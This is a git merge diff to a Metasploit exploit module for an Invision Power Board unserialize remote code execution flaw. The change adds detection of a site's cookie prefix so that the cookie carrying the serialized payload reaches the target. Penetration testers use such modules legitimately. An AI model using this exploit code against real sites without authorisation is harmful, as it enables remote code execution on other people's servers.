Merge branch 'invision_pboard_cookie_prefix' of git://github.com/jvazquez-r7/metasploit-framework into jvazquez-r7-invision_pboard_cookie_prefix

Author: sinn3r

modules/exploits/unix/webapp/invision_pboard_unserialize_exec.rb

@@ -109,6 +109,20 @@ def exploit
 		@upload_php = rand_text_alpha(rand(4) + 4) + ".php"
 		@peer = "#{rhost}:#{rport}"
 
+		print_status("#{@peer} - Checking for cookie prefix")
+		res = send_request_cgi(
+		{
+			'uri' => "#{base}index.php",
+			'method' => 'GET'
+		})
+
+		if res and res.code == 200 and res.headers['Set-Cookie'] =~ /(.+)session/
+			print_status("#{@peer} - Cookie prefix #{$1} found")
+			cookie_prefix = $1
+		else
+			cookie_prefix = ""
+		end
+
 		# get_write_exec_payload uses a function, which limits our ability to support
 		# Linux payloads, because that requires a space:
 		#   function my_cmd
@@ -128,7 +142,7 @@ def exploit
 		{
 			'uri' => "#{base}index.php?#{php_payload}",
 			'method' => 'GET',
-			'cookie' => "member_id=#{Rex::Text.uri_encode(db_driver_mysql)}"
+			'cookie' => "#{cookie_prefix}member_id=#{Rex::Text.uri_encode(db_driver_mysql)}"
 		})
 
 		if not res or res.code != 200